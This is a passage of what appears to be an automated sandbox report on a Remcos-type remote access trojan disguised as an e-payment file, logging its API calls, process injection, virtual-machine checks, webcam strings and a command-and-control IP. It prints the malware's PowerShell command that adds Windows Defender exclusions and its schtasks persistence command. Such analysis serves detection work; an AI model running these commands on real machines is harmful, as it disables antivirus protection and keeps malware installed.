            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c13_2_0040A71E
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_004057B6
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?13_2_0040BEA2
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: JXHPwNYzysUjKo.exe, JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, JXHPwNYzysUjKo.exe, 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, JXHPwNYzysUjKo.exe, 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: @HARDWARE\ACPI\DSDT\VBOX__PROCMON_WINDOW_CLASSPROCEXPL21invalid vector<T> subscript?playaudiodatafmt WAVERIFF.wav%Y-%m-%d %H.%MgetcamsingleframenocamerastartcamcapclosecamgetcamframeinitcamcapFreeFrameGetFrameCloseCameraOpenCameracamdlldatacamframe|dmc|[DataStart][DataStart]0000%02i:%02i:%02i:%03i [KeepAlive] Enabled! (Timeout: %i seconds)
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845340748.00000000013E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040E4C4 LoadLibraryA,GetProcAddress,13_2_0040E4C4
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004011A3 mov eax, dword ptr fs:[00000030h]13_2_004011A3
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"Jump to behavior
            Contains functionality to inject code into remote processes
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040D477 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,13_2_0040D477
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeMemory written: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeMemory written: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess created: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"Jump to behavior
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: addnew|cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1|cmd|62.102.148.166|cmd|remcos_rpklfmytvoel
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernagercmd|bank
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1|cmd|62.102.148.166|cmd|
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|dnesdayThuThursdayFriFri88
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernafor t)|cmd||cmd
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager100/
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerna 10 Enterprise (
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerpklfmytvo
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1@Q
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|ry:Ma
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManageranagerYqH4
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1|cmd|
            Source: logs.dat.8.drBinary or memory string: [ Program Manager ]
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageranager|Windows
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1|cmd|62.102.148.166|cmd|remcos_rpklfmytvo
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1H
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerna64 bit)|cmd||cmd
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1|cmd|62.102.148.166
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManageranagerZZ
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|edWednesdayThuThursday$
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,13_2_0040818A
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeQueries volume information: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
